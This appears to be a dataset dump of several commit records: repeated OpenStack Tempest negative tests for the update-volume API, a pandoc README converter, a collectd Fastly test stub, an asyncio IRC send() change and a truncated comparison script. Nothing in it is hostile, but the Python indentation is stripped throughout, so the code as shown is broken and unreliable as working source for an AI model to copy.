# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest import config
from tempest.lib import exceptions as lib_exc
from tempest import test
CONF = config.CONF
class VolumesAdminNegativeTest(base.BaseV2ComputeAdminTest):
@classmethod
def skip_checks(cls):
super(VolumesAdminNegativeTest, cls).skip_checks()
if not CONF.service_available.cinder:
skip_msg = ("%s skipped as Cinder is not available" % cls.__name__)
raise cls.skipException(skip_msg)
@classmethod
def setup_clients(cls):
super(VolumesAdminNegativeTest, cls).setup_clients()
cls.servers_admin_client = cls.os_adm.servers_client
@classmethod
def resource_setup(cls):
super(VolumesAdminNegativeTest, cls).resource_setup()
cls.server = cls.create_test_server(wait_until='ACTIVE')
@test.idempotent_id('309b5ecd-0585-4a7e-a36f-d2b2bf55259d')
def test_update_attached_volume_with_nonexistent_volume_in_uri(self):
volume = self.create_volume()
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound,
self.servers_admin_client.update_attached_volume,
self.server['id'], nonexistent_volume,
volumeId=volume['id'])
@test.idempotent_id('7dcac15a-b107-46d3-a5f6-cb863f4e454a')
def test_update_attached_volume_with_nonexistent_volume_in_body(self):
volume = self.create_volume()
self.attach_volume(self.server, volume)
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.BadRequest,
self.servers_admin_client.update_attached_volume,
self.server['id'], volume['id'],
volumeId=nonexistent_volume)
|
Add negative tests about update-volume API
|
Add negative tests about update-volume API
As the following part of API-WG guidline[1],
If a request contains a reference to a nonexistent resource in the
body (not URI), the code should be 400 Bad Request. Do not use 404
NotFound because :rfc:`7231#section-6.5.4` (section 6.5.4) mentions
the origin server did not find a current representation for the
target resource for 404 and representation for the target resource
means a URI
Nova should return a NotFound(404) on this first test case, but it
should return a BadRequest response(400) in this second case, because
the second volume id is specified in a request body.
[1]: https://github.com/openstack/api-wg/blob/master/guidelines/http.rst#failure-code-clarifications
Depends-On: Ib781b116f5af713d64b5880858cc4f81c3da3977
Related-Bug: #1629110
Change-Id: I409c4fd53e272f6b15fb2a34068e3d003317290e
|
Python
|
apache-2.0
|
cisco-openstack/tempest,masayukig/tempest,openstack/tempest,Juniper/tempest,vedujoshi/tempest,openstack/tempest,cisco-openstack/tempest,masayukig/tempest,vedujoshi/tempest,Juniper/tempest
|
Add negative tests about update-volume API
As the following part of API-WG guidline[1],
If a request contains a reference to a nonexistent resource in the
body (not URI), the code should be 400 Bad Request. Do not use 404
NotFound because :rfc:`7231#section-6.5.4` (section 6.5.4) mentions
the origin server did not find a current representation for the
target resource for 404 and representation for the target resource
means a URI
Nova should return a NotFound(404) on this first test case, but it
should return a BadRequest response(400) in this second case, because
the second volume id is specified in a request body.
[1]: https://github.com/openstack/api-wg/blob/master/guidelines/http.rst#failure-code-clarifications
Depends-On: Ib781b116f5af713d64b5880858cc4f81c3da3977
Related-Bug: #1629110
Change-Id: I409c4fd53e272f6b15fb2a34068e3d003317290e
|
# Copyright 2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest import config
from tempest.lib import exceptions as lib_exc
from tempest import test
CONF = config.CONF
class VolumesAdminNegativeTest(base.BaseV2ComputeAdminTest):
@classmethod
def skip_checks(cls):
super(VolumesAdminNegativeTest, cls).skip_checks()
if not CONF.service_available.cinder:
skip_msg = ("%s skipped as Cinder is not available" % cls.__name__)
raise cls.skipException(skip_msg)
@classmethod
def setup_clients(cls):
super(VolumesAdminNegativeTest, cls).setup_clients()
cls.servers_admin_client = cls.os_adm.servers_client
@classmethod
def resource_setup(cls):
super(VolumesAdminNegativeTest, cls).resource_setup()
cls.server = cls.create_test_server(wait_until='ACTIVE')
@test.idempotent_id('309b5ecd-0585-4a7e-a36f-d2b2bf55259d')
def test_update_attached_volume_with_nonexistent_volume_in_uri(self):
volume = self.create_volume()
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound,
self.servers_admin_client.update_attached_volume,
self.server['id'], nonexistent_volume,
volumeId=volume['id'])
@test.idempotent_id('7dcac15a-b107-46d3-a5f6-cb863f4e454a')
def test_update_attached_volume_with_nonexistent_volume_in_body(self):
volume = self.create_volume()
self.attach_volume(self.server, volume)
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.BadRequest,
self.servers_admin_client.update_attached_volume,
self.server['id'], volume['id'],
volumeId=nonexistent_volume)
|
<commit_before><commit_msg>Add negative tests about update-volume API
As the following part of API-WG guidline[1],
If a request contains a reference to a nonexistent resource in the
body (not URI), the code should be 400 Bad Request. Do not use 404
NotFound because :rfc:`7231#section-6.5.4` (section 6.5.4) mentions
the origin server did not find a current representation for the
target resource for 404 and representation for the target resource
means a URI
Nova should return a NotFound(404) on this first test case, but it
should return a BadRequest response(400) in this second case, because
the second volume id is specified in a request body.
[1]: https://github.com/openstack/api-wg/blob/master/guidelines/http.rst#failure-code-clarifications
Depends-On: Ib781b116f5af713d64b5880858cc4f81c3da3977
Related-Bug: #1629110
Change-Id: I409c4fd53e272f6b15fb2a34068e3d003317290e<commit_after>
|
# Copyright 2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest import config
from tempest.lib import exceptions as lib_exc
from tempest import test
CONF = config.CONF
class VolumesAdminNegativeTest(base.BaseV2ComputeAdminTest):
@classmethod
def skip_checks(cls):
super(VolumesAdminNegativeTest, cls).skip_checks()
if not CONF.service_available.cinder:
skip_msg = ("%s skipped as Cinder is not available" % cls.__name__)
raise cls.skipException(skip_msg)
@classmethod
def setup_clients(cls):
super(VolumesAdminNegativeTest, cls).setup_clients()
cls.servers_admin_client = cls.os_adm.servers_client
@classmethod
def resource_setup(cls):
super(VolumesAdminNegativeTest, cls).resource_setup()
cls.server = cls.create_test_server(wait_until='ACTIVE')
@test.idempotent_id('309b5ecd-0585-4a7e-a36f-d2b2bf55259d')
def test_update_attached_volume_with_nonexistent_volume_in_uri(self):
volume = self.create_volume()
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound,
self.servers_admin_client.update_attached_volume,
self.server['id'], nonexistent_volume,
volumeId=volume['id'])
@test.idempotent_id('7dcac15a-b107-46d3-a5f6-cb863f4e454a')
def test_update_attached_volume_with_nonexistent_volume_in_body(self):
volume = self.create_volume()
self.attach_volume(self.server, volume)
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.BadRequest,
self.servers_admin_client.update_attached_volume,
self.server['id'], volume['id'],
volumeId=nonexistent_volume)
|
Add negative tests about update-volume API
As the following part of API-WG guidline[1],
If a request contains a reference to a nonexistent resource in the
body (not URI), the code should be 400 Bad Request. Do not use 404
NotFound because :rfc:`7231#section-6.5.4` (section 6.5.4) mentions
the origin server did not find a current representation for the
target resource for 404 and representation for the target resource
means a URI
Nova should return a NotFound(404) on this first test case, but it
should return a BadRequest response(400) in this second case, because
the second volume id is specified in a request body.
[1]: https://github.com/openstack/api-wg/blob/master/guidelines/http.rst#failure-code-clarifications
Depends-On: Ib781b116f5af713d64b5880858cc4f81c3da3977
Related-Bug: #1629110
Change-Id: I409c4fd53e272f6b15fb2a34068e3d003317290e# Copyright 2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest import config
from tempest.lib import exceptions as lib_exc
from tempest import test
CONF = config.CONF
class VolumesAdminNegativeTest(base.BaseV2ComputeAdminTest):
@classmethod
def skip_checks(cls):
super(VolumesAdminNegativeTest, cls).skip_checks()
if not CONF.service_available.cinder:
skip_msg = ("%s skipped as Cinder is not available" % cls.__name__)
raise cls.skipException(skip_msg)
@classmethod
def setup_clients(cls):
super(VolumesAdminNegativeTest, cls).setup_clients()
cls.servers_admin_client = cls.os_adm.servers_client
@classmethod
def resource_setup(cls):
super(VolumesAdminNegativeTest, cls).resource_setup()
cls.server = cls.create_test_server(wait_until='ACTIVE')
@test.idempotent_id('309b5ecd-0585-4a7e-a36f-d2b2bf55259d')
def test_update_attached_volume_with_nonexistent_volume_in_uri(self):
volume = self.create_volume()
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound,
self.servers_admin_client.update_attached_volume,
self.server['id'], nonexistent_volume,
volumeId=volume['id'])
@test.idempotent_id('7dcac15a-b107-46d3-a5f6-cb863f4e454a')
def test_update_attached_volume_with_nonexistent_volume_in_body(self):
volume = self.create_volume()
self.attach_volume(self.server, volume)
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.BadRequest,
self.servers_admin_client.update_attached_volume,
self.server['id'], volume['id'],
volumeId=nonexistent_volume)
|
<commit_before><commit_msg>Add negative tests about update-volume API
As the following part of API-WG guidline[1],
If a request contains a reference to a nonexistent resource in the
body (not URI), the code should be 400 Bad Request. Do not use 404
NotFound because :rfc:`7231#section-6.5.4` (section 6.5.4) mentions
the origin server did not find a current representation for the
target resource for 404 and representation for the target resource
means a URI
Nova should return a NotFound(404) on this first test case, but it
should return a BadRequest response(400) in this second case, because
the second volume id is specified in a request body.
[1]: https://github.com/openstack/api-wg/blob/master/guidelines/http.rst#failure-code-clarifications
Depends-On: Ib781b116f5af713d64b5880858cc4f81c3da3977
Related-Bug: #1629110
Change-Id: I409c4fd53e272f6b15fb2a34068e3d003317290e<commit_after># Copyright 2016 NEC Corporation. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from tempest.api.compute import base
from tempest.common.utils import data_utils
from tempest import config
from tempest.lib import exceptions as lib_exc
from tempest import test
CONF = config.CONF
class VolumesAdminNegativeTest(base.BaseV2ComputeAdminTest):
@classmethod
def skip_checks(cls):
super(VolumesAdminNegativeTest, cls).skip_checks()
if not CONF.service_available.cinder:
skip_msg = ("%s skipped as Cinder is not available" % cls.__name__)
raise cls.skipException(skip_msg)
@classmethod
def setup_clients(cls):
super(VolumesAdminNegativeTest, cls).setup_clients()
cls.servers_admin_client = cls.os_adm.servers_client
@classmethod
def resource_setup(cls):
super(VolumesAdminNegativeTest, cls).resource_setup()
cls.server = cls.create_test_server(wait_until='ACTIVE')
@test.idempotent_id('309b5ecd-0585-4a7e-a36f-d2b2bf55259d')
def test_update_attached_volume_with_nonexistent_volume_in_uri(self):
volume = self.create_volume()
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.NotFound,
self.servers_admin_client.update_attached_volume,
self.server['id'], nonexistent_volume,
volumeId=volume['id'])
@test.idempotent_id('7dcac15a-b107-46d3-a5f6-cb863f4e454a')
def test_update_attached_volume_with_nonexistent_volume_in_body(self):
volume = self.create_volume()
self.attach_volume(self.server, volume)
nonexistent_volume = data_utils.rand_uuid()
self.assertRaises(lib_exc.BadRequest,
self.servers_admin_client.update_attached_volume,
self.server['id'], volume['id'],
volumeId=nonexistent_volume)
|
|
3bae553c1d5524ffa64cc1710574554a07a76357
|
register.py
|
register.py
|
# -*- coding: utf-8 -*-
#
# register.py
#
# purpose: Automagically creates a Rst README.txt
# author: Filipe P. A. Fernandes
# e-mail: ocefpaf@gmail
# web: http://ocefpaf.github.io/
# created: 10-Apr-2014
# modified: Fri 11 Apr 2014 12:10:43 AM BRT
#
# obs: https://coderwall.com/p/qawuyq
#
import os
import pandoc
home = os.path.expanduser("~")
pandoc.core.PANDOC_PATH = os.path.join(home, 'bin', 'pandoc')
doc = pandoc.Document()
doc.markdown = open('README.md').read()
with open('README.txt', 'w+') as f:
f.write(doc.rst)
# Some modifications are need to README.txt before registering. Rendering this
# part useless...
if False:
os.system("python2 setup.py register")
os.remove('README.txt')
|
Convert README from markdown to RST.
|
Convert README from markdown to RST.
|
Python
|
mit
|
pyoceans/python-seawater,ocefpaf/python-seawater,ocefpaf/python-seawater,pyoceans/python-seawater
|
Convert README from markdown to RST.
|
# -*- coding: utf-8 -*-
#
# register.py
#
# purpose: Automagically creates a Rst README.txt
# author: Filipe P. A. Fernandes
# e-mail: ocefpaf@gmail
# web: http://ocefpaf.github.io/
# created: 10-Apr-2014
# modified: Fri 11 Apr 2014 12:10:43 AM BRT
#
# obs: https://coderwall.com/p/qawuyq
#
import os
import pandoc
home = os.path.expanduser("~")
pandoc.core.PANDOC_PATH = os.path.join(home, 'bin', 'pandoc')
doc = pandoc.Document()
doc.markdown = open('README.md').read()
with open('README.txt', 'w+') as f:
f.write(doc.rst)
# Some modifications are need to README.txt before registering. Rendering this
# part useless...
if False:
os.system("python2 setup.py register")
os.remove('README.txt')
|
<commit_before><commit_msg>Convert README from markdown to RST.<commit_after>
|
# -*- coding: utf-8 -*-
#
# register.py
#
# purpose: Automagically creates a Rst README.txt
# author: Filipe P. A. Fernandes
# e-mail: ocefpaf@gmail
# web: http://ocefpaf.github.io/
# created: 10-Apr-2014
# modified: Fri 11 Apr 2014 12:10:43 AM BRT
#
# obs: https://coderwall.com/p/qawuyq
#
import os
import pandoc
home = os.path.expanduser("~")
pandoc.core.PANDOC_PATH = os.path.join(home, 'bin', 'pandoc')
doc = pandoc.Document()
doc.markdown = open('README.md').read()
with open('README.txt', 'w+') as f:
f.write(doc.rst)
# Some modifications are need to README.txt before registering. Rendering this
# part useless...
if False:
os.system("python2 setup.py register")
os.remove('README.txt')
|
Convert README from markdown to RST.# -*- coding: utf-8 -*-
#
# register.py
#
# purpose: Automagically creates a Rst README.txt
# author: Filipe P. A. Fernandes
# e-mail: ocefpaf@gmail
# web: http://ocefpaf.github.io/
# created: 10-Apr-2014
# modified: Fri 11 Apr 2014 12:10:43 AM BRT
#
# obs: https://coderwall.com/p/qawuyq
#
import os
import pandoc
home = os.path.expanduser("~")
pandoc.core.PANDOC_PATH = os.path.join(home, 'bin', 'pandoc')
doc = pandoc.Document()
doc.markdown = open('README.md').read()
with open('README.txt', 'w+') as f:
f.write(doc.rst)
# Some modifications are need to README.txt before registering. Rendering this
# part useless...
if False:
os.system("python2 setup.py register")
os.remove('README.txt')
|
<commit_before><commit_msg>Convert README from markdown to RST.<commit_after># -*- coding: utf-8 -*-
#
# register.py
#
# purpose: Automagically creates a Rst README.txt
# author: Filipe P. A. Fernandes
# e-mail: ocefpaf@gmail
# web: http://ocefpaf.github.io/
# created: 10-Apr-2014
# modified: Fri 11 Apr 2014 12:10:43 AM BRT
#
# obs: https://coderwall.com/p/qawuyq
#
import os
import pandoc
home = os.path.expanduser("~")
pandoc.core.PANDOC_PATH = os.path.join(home, 'bin', 'pandoc')
doc = pandoc.Document()
doc.markdown = open('README.md').read()
with open('README.txt', 'w+') as f:
f.write(doc.rst)
# Some modifications are need to README.txt before registering. Rendering this
# part useless...
if False:
os.system("python2 setup.py register")
os.remove('README.txt')
|
|
4f3d767ff899287252e8d3ebdbc0ee9a1a0b8d54
|
test/unit/test_fastly.py
|
test/unit/test_fastly.py
|
from ..helpers import *
class TestFastly(object):
def setup(self):
self.collectd = MagicMock()
self.modules = patch.dict('sys.modules', {'collectd': self.collectd})
self.modules.start()
from collectd_cdn import fastly
self.fastly = fastly.CdnFastly()
def teardown(self):
self.modules.stop()
|
Patch sys.modules for collectd import
|
Patch sys.modules for collectd import
So that we can test the plugin independent of collectd.
|
Python
|
mit
|
gds-operations/collectd-cdn
|
Patch sys.modules for collectd import
So that we can test the plugin independent of collectd.
|
from ..helpers import *
class TestFastly(object):
def setup(self):
self.collectd = MagicMock()
self.modules = patch.dict('sys.modules', {'collectd': self.collectd})
self.modules.start()
from collectd_cdn import fastly
self.fastly = fastly.CdnFastly()
def teardown(self):
self.modules.stop()
|
<commit_before><commit_msg>Patch sys.modules for collectd import
So that we can test the plugin independent of collectd.<commit_after>
|
from ..helpers import *
class TestFastly(object):
def setup(self):
self.collectd = MagicMock()
self.modules = patch.dict('sys.modules', {'collectd': self.collectd})
self.modules.start()
from collectd_cdn import fastly
self.fastly = fastly.CdnFastly()
def teardown(self):
self.modules.stop()
|
Patch sys.modules for collectd import
So that we can test the plugin independent of collectd.from ..helpers import *
class TestFastly(object):
def setup(self):
self.collectd = MagicMock()
self.modules = patch.dict('sys.modules', {'collectd': self.collectd})
self.modules.start()
from collectd_cdn import fastly
self.fastly = fastly.CdnFastly()
def teardown(self):
self.modules.stop()
|
<commit_before><commit_msg>Patch sys.modules for collectd import
So that we can test the plugin independent of collectd.<commit_after>from ..helpers import *
class TestFastly(object):
def setup(self):
self.collectd = MagicMock()
self.modules = patch.dict('sys.modules', {'collectd': self.collectd})
self.modules.start()
from collectd_cdn import fastly
self.fastly = fastly.CdnFastly()
def teardown(self):
self.modules.stop()
|
|
0f20599968b2ab848f8e3fde912f8d0ecdfba509
|
asyncio_irc/connection.py
|
asyncio_irc/connection.py
|
import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send(b'USER meshybot 0 * :MeshyBot7')
self.send(b'NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
|
import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send('USER meshybot 0 * :MeshyBot7')
self.send('NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
# Cast to bytes
try:
message = message.encode()
except AttributeError:
pass
# Add line ending.
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
|
Allow Connection.send to take unicode message
|
Allow Connection.send to take unicode message
|
Python
|
bsd-2-clause
|
meshy/framewirc
|
import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send(b'USER meshybot 0 * :MeshyBot7')
self.send(b'NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
Allow Connection.send to take unicode message
|
import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send('USER meshybot 0 * :MeshyBot7')
self.send('NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
# Cast to bytes
try:
message = message.encode()
except AttributeError:
pass
# Add line ending.
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
|
<commit_before>import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send(b'USER meshybot 0 * :MeshyBot7')
self.send(b'NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
<commit_msg>Allow Connection.send to take unicode message<commit_after>
|
import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send('USER meshybot 0 * :MeshyBot7')
self.send('NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
# Cast to bytes
try:
message = message.encode()
except AttributeError:
pass
# Add line ending.
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
|
import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send(b'USER meshybot 0 * :MeshyBot7')
self.send(b'NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
Allow Connection.send to take unicode messageimport asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send('USER meshybot 0 * :MeshyBot7')
self.send('NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
# Cast to bytes
try:
message = message.encode()
except AttributeError:
pass
# Add line ending.
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
|
<commit_before>import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send(b'USER meshybot 0 * :MeshyBot7')
self.send(b'NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
<commit_msg>Allow Connection.send to take unicode message<commit_after>import asyncio
from .message import Message
class Connection:
"""
Communicates with an IRC network.
Incoming data is transformed into Message objects, and sent to `listeners`.
"""
def __init__(self, *, listeners, host, port, ssl=True):
self.listeners = listeners
self.host = host
self.port = port
self.ssl = ssl
@asyncio.coroutine
def connect(self):
"""Connect to the server, and dispatch incoming messages."""
connection = asyncio.open_connection(self.host, self.port, ssl=self.ssl)
self.reader, self.writer = yield from connection
self.on_connect()
self._connected = True
while self._connected:
raw_message = yield from self.reader.readline()
self.handle(raw_message)
def disconnect(self):
"""Close the connection to the server."""
self._connected = False
self.writer.close()
def handle(self, raw_message):
"""Dispatch the message to all listeners."""
if not raw_message:
self.disconnect()
return
message = Message(raw_message)
for listener in self.listeners:
listener.handle(self, message)
def on_connect(self):
"""Upon connection to the network, send user's credentials."""
self.send('USER meshybot 0 * :MeshyBot7')
self.send('NICK meshybot')
def send(self, message):
"""Dispatch a message to the IRC network."""
# Cast to bytes
try:
message = message.encode()
except AttributeError:
pass
# Add line ending.
message = message + b'\r\n'
print('write', message)
self.writer.write(message)
|
bea6560ea76bd90766aa486f74593aab26beee27
|
compare_real_to_dagsim.py
|
compare_real_to_dagsim.py
|
#!/usr/bin/env python3
## Copyright 2017 Eugenio Gianniti
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
import csv
import os
import sys
from collections import defaultdict
from pathlib import PurePath
if len (sys.argv) != 2:
print ("error: wrong number of input arguments", file = sys.stderr)
sys.exit (2)
else:
root = sys.argv[1]
def parse_dir_name (directory):
experiment = query = None
